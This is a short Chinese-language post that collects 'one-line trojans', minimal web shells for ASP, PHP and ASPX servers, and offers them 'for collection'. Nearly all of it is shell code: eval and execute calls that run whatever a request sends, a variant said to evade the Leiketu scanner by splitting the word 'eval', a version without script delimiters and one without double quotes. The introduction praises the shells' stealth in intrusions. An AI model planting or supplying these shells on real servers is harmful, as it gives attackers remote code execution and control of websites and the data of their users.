一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。但是正是因为它短小精悍,所以目标特征也很明显,非常容易被杀软等过滤和杀掉,网上目前有些变种,现收集了一些,供收藏。
asp一句话
<%execute(request("1"))%>
php一句话
<?php eval($_POST[1]);?>
aspx一句话
<script language="C#" runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
不用'<%,%>'的asp一句话
<script language=VBScript runat=server>execute request("1")</script>
不用双引号的一句话。
<%eval request(chr(35))%>
